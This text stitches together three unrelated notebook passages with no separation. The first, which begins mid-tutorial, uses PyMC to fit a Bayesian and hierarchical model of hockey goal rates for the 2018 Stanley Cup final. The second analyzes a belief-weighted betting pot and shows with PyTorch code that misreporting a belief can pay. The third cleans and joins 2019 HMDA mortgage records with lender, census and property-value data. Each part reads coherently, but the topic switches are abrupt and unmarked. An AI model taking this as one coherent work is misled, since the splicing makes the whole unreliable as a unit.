Each value of `mu` is a possible goal scoring rate.
For a given value of `mu`, we can generate a distribution of goals scored in a particular game, which is Poisson.
But we don't have a given value of `mu`, we have a whole bunch of values for `mu`, with different probabilities.
So the posterior predictive distribution is a mixture of Poissons with different weights.
The simplest way to generate the posterior predictive distribution is to
1. Draw a random `mu` from the posterior distribution.
2. Draw a random number of goals from `Poisson(mu)`.
3. Repeat.
Here's a function that draws a sample from a posterior `Suite` (the grid approximation, not `GammaSuite`).
```
def sample_suite(suite, size):
"""Draw a random sample from a Suite
suite: Suite object
size: sample size
"""
xs, ps = zip(*suite.items())
return np.random.choice(xs, size, replace=True, p=ps)
```
Here's a sample of `mu` drawn from the posterior distribution (after one game).
```
size = 10000
sample_post = sample_suite(posterior, size)
np.mean(sample_post)
```
Here's what the posterior distribution looks like.
```
plot_cdf(sample_post, label='posterior sample')
cdf_rates()
```
Now for each value of `mu` in the posterior sample we draw one sample from `Poisson(mu)`
```
sample_post_pred = np.random.poisson(sample_post)
np.mean(sample_post_pred)
```
Here's what the posterior predictive distribution looks like.
```
plot_pmf(sample_post_pred, label='posterior predictive sample')
pmf_goals()
```
## Posterior prediction done wrong
The posterior predictive distribution represents uncertainty from two sources:
1. We don't know `mu`
2. Even if we knew `mu`, we would not know the score of the next game.
It is tempting, but wrong, to generate a posterior prediction by taking the mean of the posterior distribution and drawing samples from `Poisson(mu)` with just a single value of `mu`.
That's wrong because it eliminates one of our sources of uncertainty.
Here's an example:
```
mu_mean = np.mean(sample_post)
sample_post_pred_wrong = np.random.poisson(mu_mean, size)
np.mean(sample_post_pred_wrong)
```
Here's what the samples look like:
```
plot_cdf(sample_post_pred, label='posterior predictive sample')
plot_cdf(sample_post_pred_wrong, label='incorrect posterior predictive')
cdf_goals()
```
In the incorrect predictive sample, low values and high values are slightly less likely.
The means are about the same:
```
print(np.mean(sample_post_pred), np.mean(sample_post_pred_wrong))
```
But the standard deviation of the incorrect distribution is lower.
```
print(np.std(sample_post_pred), np.std(sample_post_pred_wrong))
```
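This is the law of total variance at work: under the correct posterior predictive distribution, $\mathrm{Var}(\text{goals}) = \mathbb{E}[\mu] + \mathrm{Var}(\mu)$, the Poisson variance plus the spread of the posterior, while the incorrect sample only has variance $\mathbb{E}[\mu]$, because it ignores the uncertainty about `mu`.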
## Abusing PyMC
Ok, we are almost ready to use PyMC for its intended purpose, but first we are going to abuse it a little more.
Previously we used PyMC to draw a sample from a Poisson distribution with known `mu`.
Now we'll use it to draw a sample from the prior distribution of `mu`, with known `alpha` and `beta`.
We still have the values I estimated based on previous playoff finals:
```
print(alpha, beta)
```
Now we can draw a sample from the prior distribution of `mu`:
```
model = pm.Model()
with model:
mu = pm.Gamma('mu', alpha, beta)
trace = pm.sample_prior_predictive(1000)
```
This might not be a sensible way to use PyMC. If we just want to sample from the prior predictive distribution, we could use NumPy or SciPy just as well. We're doing this to develop and test the model incrementally.
So let's see if the sample looks right.
```
sample_prior_pm = trace['mu']
np.mean(sample_prior_pm)
sample_prior = sample_suite(prior, 2000)
np.mean(sample_prior)
plot_cdf(sample_prior, label='prior')
plot_cdf(sample_prior_pm, label='prior pymc')
cdf_rates()
```
It looks pretty good (although not actually as close as I expected).
Now let's extend the model to sample from the prior predictive distribution. This is still a silly way to do it, but it is one more step toward inference.
```
model = pm.Model()
with model:
mu = pm.Gamma('mu', alpha, beta)
goals = pm.Poisson('goals', mu, observed=[6])
trace = pm.sample_prior_predictive(2000)
```
Let's see how the results compare with a sample from the prior predictive distribution, generated by plain old NumPy.
```
sample_prior_pred_pm = trace['goals'].flatten()
np.mean(sample_prior_pred_pm)
sample_prior_pred = np.random.poisson(sample_prior)
np.mean(sample_prior_pred)
```
Looks good.
```
plot_cdf(sample_prior_pred, label='prior pred')
plot_cdf(sample_prior_pred_pm, label='prior pred pymc')
cdf_goals()
```
## Using PyMC
Finally, we are ready to use PyMC for actual inference. We just have to make one small change.
Instead of generating `goals`, we'll mark goals as `observed` and provide the observed data, `6`:
```
model = pm.Model()
with model:
mu = pm.Gamma('mu', alpha, beta)
goals = pm.Poisson('goals', mu, observed=[6])
trace = pm.sample(2000, tune=1000)
```
With `goals` fixed, the only unknown is `mu`, so `trace` contains a sample drawn from the posterior distribution of `mu`. We can plot the posterior using a function provided by PyMC:
```
pm.plot_posterior(trace)
pdf_rate()
```
And we can extract a sample from the posterior of `mu`
```
sample_post_pm = trace['mu']
np.mean(sample_post_pm)
```
And compare it to the sample we drew from the grid approximation:
```
plot_cdf(sample_post, label='posterior grid')
plot_cdf(sample_post_pm, label='posterior pymc')
cdf_rates()
```
Again, it looks pretty good.
To generate a posterior predictive distribution, we can use `sample_posterior_predictive`
```
with model:
post_pred = pm.sample_posterior_predictive(trace, samples=2000)
```
Here's what it looks like:
```
sample_post_pred_pm = post_pred['goals']
sample_post_pred_pm.shape
sample_post_pred_pm = post_pred['goals'].flatten()
np.mean(sample_post_pred_pm)
plot_cdf(sample_post_pred, label='posterior pred grid')
plot_cdf(sample_post_pred_pm, label='posterior pred pm')
cdf_goals()
```
Looks pretty good!
## Going hierarchical
So far, all of this is based on a gamma prior. To choose the parameters of the prior, I used data from previous Stanley Cup finals and computed a maximum likelihood estimate (MLE). But that's not correct, because
1. It assumes that the observed goal counts are the long-term goal-scoring rates.
2. It treats `alpha` and `beta` as known values rather than parameters to estimate.
In other words, I have ignored two important sources of uncertainty. As a result, my predictions are almost certainly too confident.
The solution is a hierarchical model, where `alpha` and `beta` are the parameters that control `mu` and `mu` is the parameter that controls `goals`. Then we can use observed `goals` to update the distributions of all three unknown parameters.
Of course, now we need a prior distribution for `alpha` and `beta`. A common choice is the half Cauchy distribution (see [Gelman](http://www.stat.columbia.edu/~gelman/research/published/taumain.pdf)), but on advice of counsel, I'm going with exponential.
```
sample = pm.Exponential.dist(lam=1).random(size=1000)
plot_cdf(sample)
plt.xscale('log')
plt.xlabel('Parameter of a gamma distribution')
plt.ylabel('CDF')
np.mean(sample)
```
This distribution represents radical uncertainty about the value of this parameter: it's probably between 0.1 and 10, but it could be really big or really small.
Here's a PyMC model that generates `alpha` and `beta` from an exponential distribution.
```
model = pm.Model()
with model:
alpha = pm.Exponential('alpha', lam=1)
beta = pm.Exponential('beta', lam=1)
trace = pm.sample_prior_predictive(1000)
```
Here's what the distributions of `alpha` and `beta` look like.
```
sample_prior_alpha = trace['alpha']
plot_cdf(sample_prior_alpha, label='alpha prior')
sample_prior_beta = trace['beta']
plot_cdf(sample_prior_beta, label='beta prior')
plt.xscale('log')
plt.xlabel('Parameter of a gamma distribution')
plt.ylabel('CDF')
np.mean(sample_prior_alpha)
```
Now that we have `alpha` and `beta`, we can generate `mu`.
```
model = pm.Model()
with model:
alpha = pm.Exponential('alpha', lam=1)
beta = pm.Exponential('beta', lam=1)
mu = pm.Gamma('mu', alpha, beta)
trace = pm.sample_prior_predictive(1000)
```
Here's what the prior distribution of `mu` looks like.
```
sample_prior_mu = trace['mu']
plot_cdf(sample_prior_mu, label='mu prior hierarchical')
cdf_rates()
np.mean(sample_prior_mu)
```
In effect, the model is saying "I have never seen a hockey game before. As far as I know, it could be soccer, could be basketball, could be pinball."
If we zoom in on the range 0 to 10, we can compare the prior implied by the hierarchical model with the gamma prior I hand picked.
```
plot_cdf(sample_prior_mu, label='mu prior hierarchical')
plot_cdf(sample_prior, label='mu prior', color='gray')
plt.xlim(0, 10)
cdf_rates()
```
Obviously, they are very different. They agree that the most likely values are less than 10, but the hierarchical model admits the possibility that `mu` could be orders of magnitude bigger.
Crazy as it sounds, that's probably what we want in a non-committal prior.
Ok, last step of the forward process, let's generate some goals.
```
model = pm.Model()
with model:
alpha = pm.Exponential('alpha', lam=1)
beta = pm.Exponential('beta', lam=1)
mu = pm.Gamma('mu', alpha, beta)
goals = pm.Poisson('goals', mu)
trace = pm.sample_prior_predictive(1000)
```
Here's the prior predictive distribution of goals.
```
sample_prior_goals = trace['goals']
plot_cdf(sample_prior_goals, label='goals prior')
cdf_goals()
np.mean(sample_prior_goals)
```
To see whether that distribution is right, I ran samples using SciPy.
```
def forward_hierarchical(size=1):
alpha = st.expon().rvs(size=size)
beta = st.expon().rvs(size=size)
mu = st.gamma(a=alpha, scale=1/beta).rvs(size=size)
goals = st.poisson(mu).rvs(size=size)
return goals[0]
sample_prior_goals_st = [forward_hierarchical() for i in range(1000)];
plot_cdf(sample_prior_goals, label='goals prior')
plot_cdf(sample_prior_goals_st, label='goals prior scipy')
cdf_goals()
plt.xlim(0, 50)
plt.legend(loc='lower right')
np.mean(sample_prior_goals_st)
```
## Hierarchical inference
Once we have the forward process working, we only need a small change to run the reverse process.
```
model = pm.Model()
with model:
alpha = pm.Exponential('alpha', lam=1)
beta = pm.Exponential('beta', lam=1)
mu = pm.Gamma('mu', alpha, beta)
goals = pm.Poisson('goals', mu, observed=[6])
trace = pm.sample(1000, tune=2000, nuts_kwargs=dict(target_accept=0.99))
```
Here's the posterior distribution of `mu`. The posterior mean is close to the observed value, which is what we expect with a weakly informative prior.
```
sample_post_mu = trace['mu']
plot_cdf(sample_post_mu, label='mu posterior')
cdf_rates()
np.mean(sample_post_mu)
```
## Two teams
We can extend the model to estimate different values of `mu` for the two teams.
```
model = pm.Model()
with model:
alpha = pm.Exponential('alpha', lam=1)
beta = pm.Exponential('beta', lam=1)
mu_VGK = pm.Gamma('mu_VGK', alpha, beta)
mu_WSH = pm.Gamma('mu_WSH', alpha, beta)
goals_VGK = pm.Poisson('goals_VGK', mu_VGK, observed=[6])
goals_WSH = pm.Poisson('goals_WSH', mu_WSH, observed=[4])
trace = pm.sample(1000, tune=2000, nuts_kwargs=dict(target_accept=0.95))
```
We can use `traceplot` to review the results and do some visual diagnostics.
```
pm.traceplot(trace);
```
Here are the posterior distributions for `mu_WSH` and `mu_VGK`.
```
sample_post_mu_WSH = trace['mu_WSH']
plot_cdf(sample_post_mu_WSH, label='mu_WSH posterior')
sample_post_mu_VGK = trace['mu_VGK']
plot_cdf(sample_post_mu_VGK, label='mu_VGK posterior')
cdf_rates()
np.mean(sample_post_mu_WSH), np.mean(sample_post_mu_VGK)
```
On the basis of one game (and never having seen a previous game), here's the probability that Vegas is the better team.
```
np.mean(sample_post_mu_VGK > sample_post_mu_WSH)
```
## More background
But let's take advantage of more information. Here are the results from the previous five Stanley Cup finals (2013 to 2017), plus the 2018 series so far, ignoring games that went into overtime.
```
data = dict(BOS13 = [2, 1, 2],
CHI13 = [0, 3, 3],
NYR14 = [0, 2],
LAK14 = [3, 1],
TBL15 = [1, 4, 3, 1, 1, 0],
CHI15 = [2, 3, 2, 2, 2, 2],
SJS16 = [2, 1, 4, 1],
PIT16 = [3, 3, 2, 3],
NSH17 = [3, 1, 5, 4, 0, 0],
PIT17 = [5, 4, 1, 1, 6, 2],
VGK18 = [6,2,1],
WSH18 = [4,3,3],
)
```
Here's how we can get the data into the model.
```
model = pm.Model()
with model:
alpha = pm.Exponential('alpha', lam=1)
beta = pm.Exponential('beta', lam=1)
mu = dict()
goals = dict()
for name, observed in data.items():
mu[name] = pm.Gamma('mu_'+name, alpha, beta)
goals[name] = pm.Poisson(name, mu[name], observed=observed)
trace = pm.sample(1000, tune=2000, nuts_kwargs=dict(target_accept=0.95))
```
And here are the results.
```
pm.traceplot(trace);
```
Here are the posterior means.
```
sample_post_mu_VGK = trace['mu_VGK18']
np.mean(sample_post_mu_VGK)
sample_post_mu_WSH = trace['mu_WSH18']
np.mean(sample_post_mu_WSH)
```
They are lower with the background information than without, and closer together. Here's the updated chance that Vegas is the better team.
```
np.mean(sample_post_mu_VGK > sample_post_mu_WSH)
```
## Predictions
Even if Vegas is the better team, that doesn't mean they'll win the next game.
We can use `sample_posterior_predictive` to generate predictions.
```
with model:
post_pred = pm.sample_posterior_predictive(trace, samples=1000)
```
Here are the posterior predictive distributions of goals scored.
```
WSH = post_pred['WSH18']
WSH.shape
WSH = post_pred['WSH18'].flatten()
VGK = post_pred['VGK18'].flatten()
plot_cdf(WSH, label='WSH')
plot_cdf(VGK, label='VGK')
cdf_goals()
```
Here's the chance that Vegas wins the next game.
```
win = np.mean(VGK > WSH)
win
```
The chance that they lose.
```
lose = np.mean(WSH > VGK)
lose
```
And the chance of a tie.
```
tie = np.mean(WSH == VGK)
tie
```
## Overtime!
In the playoffs, you play overtime periods until someone scores. No stupid shootouts!
In a Poisson process with rate parameter `mu` (goals per game), the time until the next goal is exponentially distributed with mean `1/mu`, which is the scale parameter NumPy's `exponential` expects.
So we can take a sample from the posterior distributions of `mu`:
```
mu_VGK = trace['mu_VGK18']
mu_WSH = trace['mu_WSH18']
```
And generate the time to score, `tts`, for each team:
```
tts_VGK = np.random.exponential(1/mu_VGK)
np.mean(tts_VGK)
tts_WSH = np.random.exponential(1/mu_WSH)
np.mean(tts_WSH)
```
Here's the chance that Vegas wins in overtime.
```
win_ot = np.mean(tts_VGK < tts_WSH)
win_ot
```
Since `tts` is continuous, ties are essentially impossible in overtime. So the total probability that Vegas wins the next game is the chance they win in regulation plus the chance of a regulation tie times the chance they win in overtime.
```
total_win = win + tie * win_ot
total_win
```
Finally, we can simulate the rest of the series and compute the probability that Vegas wins the series.
```
def flip(p):
"""Simulate a single game."""
return np.random.random() < p
def series(wins, losses, p_win):
"""Simulate a series.
wins: number of wins so far
losses: number of losses so far
p_win: probability that the team of interest wins a game
returns: boolean, whether the team of interest wins the series
"""
while True:
if flip(p_win):
wins += 1
else:
losses += 1
if wins==4:
return True
if losses==4:
return False
series(1, 2, total_win)
t = [series(1, 2, total_win) for i in range(1000)]
np.mean(t)
```
# Exploring prediction markets
> I want to explore some ideas about making bets
- toc: true
- badges: true
- comments: true
- categories: [prediction markets, betting]
# Alice and Bob bet on the election
Alice and Bob are rational agents with their own current beliefs about whether Mr. T. will win the election. Mr. T. will either win or not, and so they view it as a Bernoulli variable $X$. Truly $X \sim \text{Ber}(\theta_{true})$.
Alice and Bob both have point estimates about the probability. They are $\theta_{a}$ and $\theta_{b}$ respectively, and therefore their beliefs are represented by their belief distributions $p_{a}(x) = \text{Ber}(x; \theta_{a})$ and $p_{b}(x) = \text{Ber}(x; \theta_{b})$.
How can Alice and Bob set up a bet they are both satisfied with?
# How do we split the pot?
The first idea Alice and Bob have is the following: they both put 50 cents in a pot, so now there is 1 dollar in the pot. When the election is over, Alice and Bob will be honest with each other about who truly won the election, so after the outcome of $X$ is revealed there will be no dispute.
How will they split the pot? They agree on the following rule: for outcome $x$, Alice (A) gets the fraction
$$
f_a(x) = \frac{p_a(x)}{p_a(x) + p_b(x)}
$$
Then *given* that A has belief $p_a$, A should expect to win
$$
\mathbb{E}_{x \sim p_a}[f_a(x)] = \theta_a \frac{\theta_a}{\theta_a + \theta_b} + (1-\theta_a) \frac{1 - \theta_a}{(1-\theta_a) + (1-\theta_b)}
$$
Likewise, B expects $\mathbb{E}_{x \sim p_b}[f_b]$. Requiring that $\theta_a$ and $\theta_b$ lie in the open interval $(0,1)$ - no absolute certainty - is a sufficient condition for this expectation to be defined, since then there is no division by zero. Also, only a Sith deals in absolutes.
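For example, with $\theta_a = 0.5$ and $\theta_b = 0.3$ (the numbers used in the code below), Alice's self-expected winnings are

$$
\mathbb{E}_{x \sim p_a}[f_a(x)] = 0.5 \cdot \frac{0.5}{0.5 + 0.3} + 0.5 \cdot \frac{0.5}{0.5 + 0.7} \approx 0.52
$$

so she expects to end up with slightly more than the half of the pot she put in.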
If instead of just two players and two outcomes, there are $M$ players and $K$ outcomes (a categorical variable), then an equivalent rule for how much each player $m$ should get would be
$$
f_m(k) = \frac{p_m(k)}{\sum_{i=1}^{M} p_i(k)}
$$
and player $m$ would expect to win
$\mathbb{E}_{k \sim p_m}[f_m(k)] = \sum_{k=1}^{K} p_m(k) f_m(k) = \sum_{k=1}^{K} p_m(k) \frac{p_m(k)}{\sum_{i=1}^{M} p_i(k)}$
We could call $\mathbb{E}_{k \sim p_m}[f_m(k)]$ the "open self-expected prize" for player $m$ and denote it $Z_m$. It is "open" because it is a function of all the probabilities, so Alice would only be able to compute it if she knew the probabilities of all the others. It is "self-expected" because Alice computes the expectation with respect to her own beliefs about the outcome.
# Would Alice and Bob participate in such a bet?
If the $M$ players contribute equal amounts to the pot, then each of them has a fraction $\frac{1}{M}$ of the pot at stake. Alice knows she expects to win $Z_a$, and she is willing to participate in the bet if she does not expect to win less than what she has at stake. That means a player $m$ is willing to participate if
$$
Z_m \geq \frac{1}{M}
$$
For a finite number of agents $M$ and a finite number of outcomes $K$, this inequality always holds. See [this MathOverflow post](https://mathoverflow.net/questions/416333/inequality-for-matrix-with-rows-summing-to-1). Thanks Federico Poloni and Iosif Pinelis!
Intuitively, this tells us that no matter what Bob thinks, Alice can compute $Z_a$ and come out in favor of participating in the bet, and likewise for Bob.
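As a quick numerical sanity check (not a proof), we can sample random belief matrices and confirm that every player's $Z_m$ is at least $\frac{1}{M}$; this sketch only assumes PyTorch and mirrors the definitions above.

```
# Sanity check (not a proof): for random belief matrices, every player's
# open self-expected prize Z_m should be at least 1/M.
import torch

torch.manual_seed(0)
M, K = 5, 3                              # players, outcomes
for _ in range(1000):
    P = torch.rand(M, K)
    P = P / P.sum(dim=1, keepdim=True)   # each row is a probability vector
    F = P / P.sum(dim=0)                 # payout fractions f_m(k)
    Z = (P * F).sum(dim=1)               # Z_m = sum_k p_m(k) * f_m(k)
    assert (Z >= 1 / M - 1e-6).all()
print("Inequality held for all sampled belief matrices")
```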
# Bob says his belief, now Alice wants to lie!
Let's say that Bob told Alice that his belief was $\theta_b = .3$. Assume that truly Alice has belief $\theta_a = .5$.
We can view all of this as a matrix $P$ whose rows are the players' belief distributions.
```
#collapse_hide
import torch
P = torch.tensor([
[.5,.5],
[.7,.3]
])
print('P:',P)
```
Then $Z_m$ is computed as follows
```
def Z(m,P):
return P[m] @ (P[m] / P.sum(dim=0))
```
Alice and Bob have exactly the same $Z$. With more than two players, this will generally not be the case.
```
#collapse_hide
print('Z_a : ', Z(0,P).item())
print('Z_b : ', Z(1,P).item())
```
But we just said that Bob said his belief first, so now the question is - would Alice want to lie about her beliefs in order to win more? To think about this we have to distinguish between the belief-distribution and the commit-distribution. For now we assume that players never change their real beliefs about the outcome, but they might present a different distribution:
We write $q_a = \text{Ber}(\theta'_a)$ to denote the distribution with which Alice participates in the bet, so she will get
$$f'_a(x) = \frac{q_a(x)}{q_a(x) + q_b(x)}$$
With this change we can look at what a player $m$ expects to win, $W_m = \mathbb{E}_{x \sim p_m}[f'_m(x)]$. The expectation is with respect to what the player truly believes about what will happen, but the public distribution $q_m(x)$ is what is used to compute the fraction.
```
def W(m,P,Q):
return P[m] @ (Q[m] / Q.sum(dim=0))
```
What if Alice chose to lie, and say that her belief is $.49$ instead of $.5$? Then her self-expectation $W_a > Z_a$, she would be better off by being dishonest:
```
#collapse_hide
import torch
#qap = 0.99999
Q = torch.tensor([
[.51,.49],
[.7,.3]
])
print('Q:', Q)
print('W_a : ', W(0,P,Q).item())
print('W_b : ', W(1,P,Q).item())
print('Alice is better off lying:', (W(0,P,Q) > Z(0,P)).item())
```
Notice that while the $Z$ vector is public, known by all players, the $W_m$ is only known by player $m$.
```
#collapse_hide
qaps = torch.linspace(0,1,1000)
was = torch.zeros_like(qaps)
for i, qap in enumerate(qaps):
Q = torch.tensor([
[1-qap,qap],
[.7,.3]
])
was[i] = W(0,P,Q).item()
argmax_wa = was.argmax()
print('Optimal thing to tell Bob', qaps[argmax_wa].item())
print('Maximum W_a', was[argmax_wa].item())
import matplotlib.pyplot as plt
plt.plot(qaps[400:600],was[400:600])
plt.xlabel("q_a(1) - Alice commit")
plt.ylabel('W_a - Alice self-expected prize')
plt.title('How much Alice expects to win as function of what she tells Bob')
plt.axvline(x=qaps[argmax_wa], label='Optimal q ' + str(round(qaps[argmax_wa].item(),3)), c='Green') #label='Maximum ' + str(round(was[argmax_wa].item(),3)), c='Green')
plt.axvline(x=0.5, label='True p ' + str(0.5), c='Purple')
plt.legend()
```
# Future work
* What if Alice and Bob take turns? Will they converge to something, possibly converging to being honest?
```
%load_ext autoreload
%autoreload 2
import pandas as pd
import numpy as np
import sys
sys.path.append('../..')
from utils.categorize_data import (setup_dti_cat, categorize_cltv, categorize_property_value_ratio,
calculate_prop_zscore, categorize_age, categorize_sex,
categorize_underwriter, categorize_loan_term, categorize_lmi)
```
### 1. Import Cleaned Data
- Rows: 17,545,457
- Columns: 87
```
hmda19_df = pd.read_csv('../../data/hmda_lar/cleaned_data/1_hmda2019_210823.csv', dtype = str)
hmda19_df.info()
```
### 2. Join with Lender Info
```
lender_def = pd.read_csv('../../data/supplemental_hmda_data/cleaned/lender_definitions_em210513.csv',
dtype = str)
lender_def.info()
lender_def2 = lender_def[['lei', 'lar_count', 'assets', 'lender_def', 'con_apps']].copy()
lender_def2.head(1)
hmda19_df = pd.merge(hmda19_df, lender_def2, how = 'left', on = ['lei'])
```
Every record in HMDA data has a lender match. There are no missing values after the join.
```
hmda19_df['lar_count'].isnull().values.sum()
```
#### Lender Definition
Only about 30,000 records, less than one percent of the overall HMDA data, come from lenders with no definition.
- 1: Banks
- 2: Credit Union
- 3: Independent Mortgage Companies
- 4: No definition
```
print(hmda19_df['lender_def'].value_counts(dropna = False, normalize = True) * 100)
```
### 3. Adding Metro Definitions
```
counties_df = pd.read_csv('../../data/census_data/county_to_metro_crosswalk/clean/all_counties_210804.csv',
dtype = str)
counties_df.info()
counties_df2 = counties_df[['fips_state_code', 'fips_county_code', 'metro_code', 'metro_type_def',
'metro_percentile']].copy()
counties_df2 = counties_df2.rename(columns = {'fips_state_code': 'state_fips',
'fips_county_code': 'county_fips'})
counties_df2.head(1)
```
#### Metro Percentile Definitions
The majority of applications come from metros in the 80th percentile or larger.
- 111: Micro
- 000: No Metro
- 99: 99th percentile
- 9: 90th percentile
```
hmda19_df = pd.merge(hmda19_df, counties_df2, how = 'left', on = ['state_fips', 'county_fips'])
hmda19_df['metro_percentile'].value_counts(dropna = False, normalize = True) * 100
```
### 4. Add Property Value by County
```
prop_values_df = pd.read_csv('../../data/census_data/property_values/' +
'ACSDT5Y2019.B25077_data_with_overlays_2021-06-23T115616.csv', dtype = str)
prop_values_df.info()
```
#### First pass at cleaning median property value data
```
prop_values_df2 = prop_values_df[(prop_values_df['GEO_ID'] != 'id')]
prop_values_df3 = prop_values_df2.rename(columns = {'B25077_001E': 'median_value',
'B25077_001M': 'median_value_moe'})
prop_values_df3['state_fips'] = prop_values_df3['GEO_ID'].str[9:11]
prop_values_df3['county_fips'] = prop_values_df3['GEO_ID'].str[11:]
prop_values_df4 = prop_values_df3[['state_fips', 'county_fips', 'median_value']].copy()
prop_values_df4.info()
```
#### Convert property value to numeric
- No property value for these two counties
```
prop_values_df4[(prop_values_df4['median_value'] == '-')]
prop_values_df4.loc[(prop_values_df4['median_value'] != '-'), 'median_prop_value'] = prop_values_df4['median_value']
prop_values_df4.loc[(prop_values_df4['median_value'] == '-'), 'median_prop_value'] = np.nan
prop_values_df4['median_prop_value'] = pd.to_numeric(prop_values_df4['median_prop_value'])
prop_values_df4[(prop_values_df4['median_prop_value'].isnull())]
hmda19_df = pd.merge(hmda19_df, prop_values_df4, how = 'left', on = ['state_fips', 'county_fips'])
hmda19_df.loc[(hmda19_df['property_value'] != 'Exempt'), 'prop_value'] = hmda19_df['property_value']
hmda19_df.loc[(hmda19_df['property_value'] == 'Exempt'), 'prop_value'] = np.nan
hmda19_df['prop_value'] = pd.to_numeric(hmda19_df['prop_value'])
```
### 5. Add Race and Ethnicity Demographic per Census Tract
```
race_df = pd.read_csv('../../data/census_data/racial_ethnic_demographics/clean/tract_race_pct2019_210204.csv',
dtype = str)
race_df.info()
race_df['white_pct'] = pd.to_numeric(race_df['white_pct'])
race_df['census_tract'] = race_df['state'] + race_df['county'] + race_df['tract']
race_df2 = race_df[['census_tract', 'total_estimate', 'white_pct', 'black_pct', 'native_pct', 'latino_pct',
'asian_pct', 'pacislander_pct', 'othercb_pct', 'asiancb_pct']].copy()
race_df2.sample(2, random_state = 303)
```
#### Create White Gradient
```
race_df2.loc[(race_df2['white_pct'] > 75), 'diverse_def'] = '1'
race_df2.loc[(race_df2['white_pct'] <= 75) & (race_df2['white_pct'] > 50), 'diverse_def'] = '2'
race_df2.loc[(race_df2['white_pct'] <= 50) & (race_df2['white_pct'] > 25), 'diverse_def'] = '3'
race_df2.loc[(race_df2['white_pct'] <= 25), 'diverse_def'] = '4'
race_df2.loc[(race_df2['white_pct'].isnull()), 'diverse_def'] = '5'
race_df2['diverse_def'].value_counts(dropna = False)
```
- 0: No census data there
- NaN: Records that don't find a match in the census data
```
hmda19_df = pd.merge(hmda19_df, race_df2, how = 'left', on = ['census_tract'])
```
Convert the NaN to 0's
```
hmda19_df.loc[(hmda19_df['diverse_def'].isnull()), 'diverse_def'] = '0'
hmda19_df['diverse_def'].value_counts(dropna = False)
```
### 7. Clean Debt-to-Income Ratio
```
dti_df = pd.DataFrame(hmda19_df['debt_to_income_ratio'].value_counts(dropna = False)).reset_index().\
rename(columns = {'index': 'debt_to_income_ratio', 'debt_to_income_ratio': 'count'})
### Convert the nulls for cleaning purposes
dti_df = dti_df.fillna('null')
dti_df.head(2)
### Running function to organize debt-to-income ratio
dti_df['dti_cat'] = dti_df.apply(setup_dti_cat, axis = 1)
dti_df.head(2)
### Drop count column and replace the null values back to NaN
dti_df2 = dti_df.drop(columns = ['count'], axis = 1)
dti_df2 = dti_df2.replace('null', np.nan)
dti_df2.head(2)
```
A third of the entire dataset is null when it comes to the DTI ratio.
```
hmda19_df = pd.merge(hmda19_df, dti_df2, how = 'left', on = ['debt_to_income_ratio'])
hmda19_df['dti_cat'].value_counts(dropna = False, normalize = True) * 100
```
### 8. Combined Loan-to-Value Ratio
```
cltv_df = pd.DataFrame(hmda19_df['combined_loan_to_value_ratio'].value_counts(dropna = False)).reset_index().\
rename(columns = {'index': 'combined_loan_to_value_ratio', 'combined_loan_to_value_ratio': 'count'})
### Convert cltv to numeric
cltv_df.loc[(cltv_df['combined_loan_to_value_ratio'] != 'Exempt'), 'cltv_ratio'] =\
cltv_df['combined_loan_to_value_ratio']
cltv_df['cltv_ratio'] = pd.to_numeric(cltv_df['cltv_ratio'])
```
#### Downpayment Flag
- 1: 20 percent or more downpayment
- 2: Less than 20 percent
- 3: Nulls
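The `categorize_cltv` helper lives in `utils.categorize_data` and isn't shown in this notebook; a minimal sketch consistent with the flag definitions above might look like this (a hypothetical reconstruction, not necessarily the actual implementation):

```
# Hypothetical sketch of categorize_cltv, based on the flag definitions above.
# The real helper lives in utils.categorize_data and may differ.
def categorize_cltv(row):
    cltv = row['cltv_ratio']
    if pd.isnull(cltv):     # Exempt / missing CLTV
        return '3'
    elif cltv <= 80:        # CLTV of 80 or less implies a downpayment of 20 percent or more
        return '1'
    else:                   # CLTV above 80 implies less than 20 percent down
        return '2'
```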
```
cltv_df['downpayment_flag'] = cltv_df.apply(categorize_cltv, axis = 1)
cltv_df2 = cltv_df.drop(columns = ['count', 'cltv_ratio'], axis = 1)
hmda19_df = pd.merge(hmda19_df, cltv_df2, how = 'left', on = ['combined_loan_to_value_ratio'])
hmda19_df['downpayment_flag'].value_counts(dropna = False)
```
### 9. Property Value Ratio Z-Score
Property value ratios are more normally distributed than raw property values. Because they are approximately normally distributed for ratios below 10, I will use z-scores and place the values into buckets based on those z-scores.
```
property_value_df = pd.DataFrame(hmda19_df.groupby(by = ['state_fips', 'county_fips', 'property_value',
'prop_value', 'median_prop_value'], dropna = False).size()).reset_index().\
rename(columns = {0: 'count'})
property_value_df['property_value_ratio'] = property_value_df['prop_value'].\
div(property_value_df['median_prop_value']).round(3)
property_value_df['prop_zscore'] = property_value_df.apply(calculate_prop_zscore, axis = 1).round(3)
property_value_df['prop_value_cat'] = property_value_df.apply(categorize_property_value_ratio, axis = 1)
property_value_df.sample(3, random_state = 303)
property_value_df2 = property_value_df[['state_fips', 'county_fips', 'property_value',
'median_prop_value', 'property_value_ratio', 'prop_zscore',
'prop_value_cat']].copy()
hmda19_df = pd.merge(hmda19_df, property_value_df2, how = 'left', on = ['state_fips', 'county_fips',
'property_value', 'median_prop_value'])
```
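`calculate_prop_zscore` and `categorize_property_value_ratio` are likewise imported helpers. The sketch below only illustrates the general pattern described above, standardizing `property_value_ratio` and bucketing on the resulting z-score; the mean, standard deviation, and cut points are placeholders rather than the values the real functions use.
```
### Illustrative only: placeholder constants and cut points, not the real helpers
RATIO_MEAN, RATIO_STD = 1.0, 0.5   # hypothetical population mean/std of property_value_ratio

def calculate_prop_zscore_sketch(row):
    """Standardize the property-value ratio; returns NaN when the ratio is missing."""
    ratio = row['property_value_ratio']
    return np.nan if pd.isnull(ratio) else (ratio - RATIO_MEAN) / RATIO_STD

def categorize_property_value_ratio_sketch(row):
    """Bucket records on the z-score; the -1/+1 cut points are placeholders."""
    z = row['prop_zscore']
    if pd.isnull(z):
        return '0'
    elif z <= -1:
        return '1'
    elif z <= 1:
        return '2'
    else:
        return '3'
```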
### 10. Applicant Age
- [9999](https://s3.amazonaws.com/cfpb-hmda-public/prod/help/2018-public-LAR-code-sheet.pdf): No Co-applicant
- 8888: Not Applicable
```
age_df = pd.DataFrame(hmda19_df['applicant_age'].value_counts(dropna = False)).reset_index().\
rename(columns = {'index': 'applicant_age', 'applicant_age': 'count'})
age_df['applicant_age_cat'] = age_df.apply(categorize_age, axis = 1)
age_df = age_df.drop(columns = ['count'], axis = 1)
```
#### Age Categories
- 1: Less than 25
- 2: 25 through 34
- 3: 35 through 44
- 4: 45 through 54
- 5: 55 through 64
- 6: 65 through 74
- 7: Greater than 74
- 8: Not Applicable
```
hmda19_df = pd.merge(hmda19_df, age_df, how = 'left', on = ['applicant_age'])
